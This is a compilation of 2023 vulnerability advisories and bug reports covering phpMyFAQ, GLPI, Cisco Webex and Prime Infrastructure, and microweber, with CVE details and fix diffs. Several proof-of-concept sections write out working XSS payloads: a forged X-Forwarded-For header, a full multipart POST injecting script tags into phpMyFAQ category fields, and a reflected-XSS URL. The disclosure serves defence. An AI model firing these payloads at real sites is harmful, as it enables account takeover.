thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the FAQ site while generating an HTML Export. This has been fixed in 3.1.12.

**thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via HTML export**

Moderate severity GitHub Reviewed Published Apr 5, 2023 to the GitHub Advisory Database • Updated Apr 6, 2023

GHSA-8p48-ghv5-7qq7: thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via HTML export

GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.7, GLPI inventory endpoint can be used to drive a SQL injection attack. It can also be used to store malicious code that could be used to perform XSS attack. By default, GLPI inventory endpoint requires no authentication. Version 10.0.7 contains a patch for this issue. As a workaround, disable native inventory.

**This is a security release, upgrading is recommended**

This release fixes several security issues that has been recently discovered. Update is **recommended!**

You can download the **GLPI 10.0.7 archive** on GitHub.

You will find below the list of security issues fixed in this bugfixes version:

*   \[SECURITY - High\] SQL injection and Stored XSS via inventory agent request (CVE-2023-28849).
*   \[SECURITY - High\] Account takeover by authenticated user (CVE-2023-28632).
*   \[SECURITY - High\] SQL injection through dynamic reports (CVE-2023-28838).
*   \[SECURITY - Moderate\] Stored XSS through dashboard administration (CVE-2023-28852).
*   \[SECURITY - Moderate\] Stored XSS on external links (CVE-2023-28636).
*   \[SECURITY - Moderate\] Reflected XSS in search pages (CVE-2023-28639).
*   \[SECURITY - Moderate\] Privilege Escalation from technician to super-admin (CVE-2023-28634).
*   \[SECURITY - Low\] Blind Server-Side Request Forgery (SSRF) in RSS feeds (CVE-2023-28633).

Also, here is a short list of main changes done in this version:

*   \[SECURITY\] Optional GLPI router to be able to use a safer web server root directory.
*   \[FEATURE\] Support of SMTP OAuth authentication.
*   \[FEATURE\] Improved inventory file upload feature.
*   \[FIX\] Many fixes and improvements on native inventory.
*   \[FIX\] Some bugs on PHP 8.2.
*   \[FIX\] Caching issues on entities.
*   \[FIX\] Boolean FullText operator not working on knowledge base search.
*   \[FIX\] Unexpected search results when using negative condition on ticket actors.
*   \[FIX\] Issues with LDAP filters/DN.
*   \[FIX\] Unexpected results when searching on knowledge base categories.

The **full changelog is available** for more details.

We would like to thank all people who contributed to this new version and all those who contributes regularly to the GLPI project!

Regards.

CVE-2023-28849: Release 10.0.7 · glpi-project/glpi

Multiple vulnerabilities in the web interface of Cisco Webex Meetings could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack or upload arbitrary files as recordings. For more information about these vulnerabilities, see the Details section of this advisory. 

**

Summary

**

*   Multiple vulnerabilities in the web interface of Cisco Webex Meetings could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack or upload arbitrary files as recordings.
    
    For more information about these vulnerabilities, see the Details section of this advisory.
    
    Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
    
    This advisory is available at the following link:  
    https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wbx-sxss-fupl-64uHbcm5
    

**

Affected Products

**

*   These vulnerabilities affect Cisco Webex Meetings, which is cloud based.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities.
    

**

Details

**

*   The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit another vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities.
    
    Details about the vulnerabilities are as follows:
    
    **CVE-2023-20132: Cisco Webex Meetings Stored Cross-Site Scripting Vulnerability**
    
    A vulnerability in the web interface of Cisco Webex Meetings could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface.
    
    This vulnerability exists because the web interface does not properly validate user-supplied input during a webinar event practice session. An attacker could exploit this vulnerability by persuading a user to click a malicious link during the session. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwe38541  
    CVE ID: CVE-2023-20132  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 5.4  
    CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    
    **CVE-2023-20134: Cisco Webex Meetings File Upload Vulnerability**
    
    A vulnerability in Cisco Webex Meetings could allow an authenticated, remote attacker to upload arbitrary files as recordings.
    
    This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTML request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to Cisco Webex Meetings as recordings.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwe38537  
    CVE ID: CVE-2023-20134  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 4.3  
    CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    

**

Workarounds

**

*   There are no workarounds that address these vulnerabilities.
    

**

Fixed Software

**

*   Cisco has addressed these vulnerabilities in Cisco Webex Meetings, which is cloud based. No user action is required.
    
    Customers who need additional information are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    

**

Exploitation and Public Announcements

**

*   The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.
    

**

Source

**

*   Cisco would like to thank the external researcher who reported these vulnerabilities.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

**

Related to This Advisory

**

**

URL

**

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2023-APR-05
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

CVE-2023-20134: Cisco Security Advisory: Cisco Webex Meetings Web UI Vulnerabilities

Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow a remote attacker to obtain privileged information and conduct cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks. For more information about these vulnerabilities, see the Details section of this advisory. 

*   The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit another vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities.
    
    Details about the vulnerabilities are as follows:
    
    **CVE-2023-20127: Cisco Prime Infrastructure Information Disclosure Vulnerability**
    
    A vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an authenticated, remote attacker to view privileged information about network devices that are managed by an affected device.
    
    This vulnerability is due to insufficient protection of sensitive data in the web-based management interface of an affected device. An attacker could exploit this vulnerability by accessing the interface as a low-privileged user and taking certain actions within the configuration pages of the network devices. A successful exploit could allow the attacker to access sensitive information about the network devices that is stored on the affected device.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwc25461  
    CVE ID: CVE-2023-20127  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 6.5  
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    
    **CVE-2023-20131: Cisco Prime Infrastructure and Cisco EPNM XSS Vulnerability**
    
    A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco EPNM could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface of an affected system.
    
    The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwc76734, CSCwd28312, CSCwd69561  
    CVE ID: CVE-2023-20131  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 5.4  
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    
    **CVE-2023-20129: Cisco Prime Infrastructure and Cisco EPNM Arbitrary File Read Vulnerability**
    
    A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco EPNM could allow an authenticated, remote attacker to view certain files from the underlying operating system.
    
    This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to access sensitive files on the underlying operating system.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwc25461, CSCwd28312  
    CVE ID: CVE-2023-20129  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 4.9  
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    
    **CVE-2023-20130: Cisco Prime Infrastructure and Cisco EPNM CSRF Vulnerability**
    
    A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco EPNM could allow an unauthenticated, remote attacker to conduct a CSRF attack and perform arbitrary actions on an affected system.
    
    The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected system with the privileges of the targeted user.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwc51948, CSCwd28312  
    CVE ID: CVE-2023-20130  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 4.3  
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE-2023-20131: Cisco Security Advisory: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager Vulnerabilities

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.3.

Valid

Reported on

Feb 16th 2023

**Description**

Using X-Forwarded-For Header Visitor can manipulate ip to trigger xss

**Proof of Concept**

    1.Visit any url and Add Header X-Forward-For: 127.0.0.1"><image/src/onerror=prompt(8)>
    2.If admin check in dashboard xss will trigger
    
    Check This image
    >https://drive.google.com/file/d/1hNSEr5Fjnzd9n62SFspW3z7Ojs-q6cCw/view?usp=share_link
    >https://drive.google.com/file/d/1cfnIoKWtLsjRUcU4J0Qs_bU-a_Z6gPNo/view?usp=share_link
    

Disclaimer: This is my own website

**Impact**

Account takeover

CVE-2023-1881: Stored XSS From Visitor to Acc Takeover in microweber

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Code That has a Vulnerability:

                // Updates an existing category
                if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
    
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                    $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                    $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                    $image = count($uploadedFile) ? $categoryImage->getFileName(
                        $categoryId,
                        $categoryLang
                    ) : $existingImage;
    
                    $categoryData = [
                        'id' => $categoryId,
                        'lang' => $categoryLang,
                        'parent_id' => $parentId,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $image,
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                    ];
    

Code without that vulnerability:

                // Save a new category
                if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                    $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                    $categoryData = [
                        'lang' => $categoryLang,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                    ];
    

Request:

    POST /admin/?action=updatecategory HTTP/2
    Host: roy.demo.phpmyfaq.de
    Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
    Content-Length: 1934
    Origin: https://roy.demo.phpmyfaq.de
    Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="catlang"
    
    en
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="parent_id"
    
    0
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="csrf"
    
    EDITthis
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="existing_image"
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="name"
    
    <script>alert(1)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="description"
    
    </textarea><script>alert(2)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="active"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="show_home"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="image"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="user_id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="grouppermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="userpermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="restricted_users"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------14208207025422371582565391486--
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

@@ -21,6 +21,7 @@

use phpMyFAQ\\Category\\CategoryRelation;

use phpMyFAQ\\Database;

use phpMyFAQ\\Filter;

use phpMyFAQ\\Strings;

  

if (!defined('IS\_VALID\_PHPMYFAQ')) {

http\_response\_code(400);

@@ -319,9 +320,10 @@

foreach ($category\->getCategoryTree() as $id => $cat) {

// CategoryHelper translated in this language?

if ($cat\['lang'\] == $lang) {

$categoryName = $cat\['name'\];

$categoryName = Strings::htmlentities($cat\['name'\]);

} else {

$categoryName = $cat\['name'\] . ' (' . $languageCodes\[strtoupper($cat\['lang'\])\] . ')';

$categoryName = Strings::htmlentities($cat\['name'\]) .

' (' . $languageCodes\[strtoupper($cat\['lang'\])\] . ')';

}

CVE-2023-1885: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@fecc803

Cross-site Scripting (XSS) - DOM in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

@@ -619,7 +619,7 @@ 'msgGlossary' => '<a href="./glossary.html">' . $PMF\_LANG\['ad\_menu\_glossary'\] . '</a>', 'privacyLink' => sprintf( '<a target="\_blank" href="%s">%s</a>', $faqConfig\->get('main.privacyURL'), Strings::htmlentities($faqConfig\->get('main.privacyURL')), $PMF\_LANG\['msgPrivacyNote'\] ), 'backToHome' => '<a href="./index.html">' . $PMF\_LANG\['msgHome'\] . '</a>', @@ -642,7 +642,7 @@ 'msgGlossary' => '<a href="index.php?' . $sids . 'action=glossary">' . $PMF\_LANG\['ad\_menu\_glossary'\] . '</a>', 'privacyLink' => sprintf( '<a target="\_blank" href="%s">%s</a>', $faqConfig\->get('main.privacyURL'), Strings::htmlentities($faqConfig\->get('main.privacyURL')), $PMF\_LANG\['msgPrivacyNote'\] ), 'allCategories' => '<a class="nav-link" href="index.php?' . $sids . 'action=show">' .

CVE-2023-1882: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@49db615

Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

@@ -106,10 +106,10 @@ function buildStopWordsHTML(data) {

}

  

// id attribute is of the format stopword\_<id>\_<lang>

elem\_id \= buildStopWordInputElemId(data\[i\].id, data\[i\].lang);

elem\_id \= buildStopWordInputElemId(data\[i\].id, escape(data\[i\].lang));

  

html += '<td>';

html += buildStopWordInputElement(elem\_id, data\[i\].stopword);

html += buildStopWordInputElement(elem\_id, escape(data\[i\].stopword));

html += '</td>';

  

if (i % maxCols \=== maxCols \- 1) {

@@ -136,7 +136,7 @@ function buildStopWordInputElement(elementId, stopword) {

elementId \= elementId || buildStopWordInputElemId();

stopword \= stopword || '';

const attrs \= 'onblur="saveStopWord(this.id)" onkeydown="saveStopWordHandleEnter(this.id, event)" onfocus="saveOldValue(this.id)"';

return '<input class="form-control form-control-sm" id="' + elementId + '" value="' + stopword + '" ' + attrs + '>';

return '<input class="form-control form-control-sm" id="' + elementId + '" value="' + escape(stopword) + '" ' + attrs + '>';

}

  

/\*\*

@@ -286,6 +286,21 @@ function() {

);

}

}

  

const escape \= (text) \=> {

const map \= {

'&': '&amp;',

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

"'": '&#039;',

};

  

return text.replace(/\[&<>"'\]/g, (mapped) \=> {

return map\[mapped\];

});

};

  

</script\>

</div\>

</div\>

CVE-2023-1884: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@7f0f921

Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

Valid

Reported on

Feb 17th 2023

**Description**

There is a reflected XSS in send2friend because the 'artlang' parameter is not sanitized.

**Proof of Concept**

visit http://phpmyfaq.local/?action=send2friend&artlang=aaaa"%3E%3Cscript%3Ealert(1);%3C/script%3E

**Fix**

sanitize the '$faqLanguage' variable in https://github.com/thorsten/phpMyFAQ/blob/main/phpmyfaq/send2friend.php#L70

**Impact**

Taking over the admin account.

Tag

#xss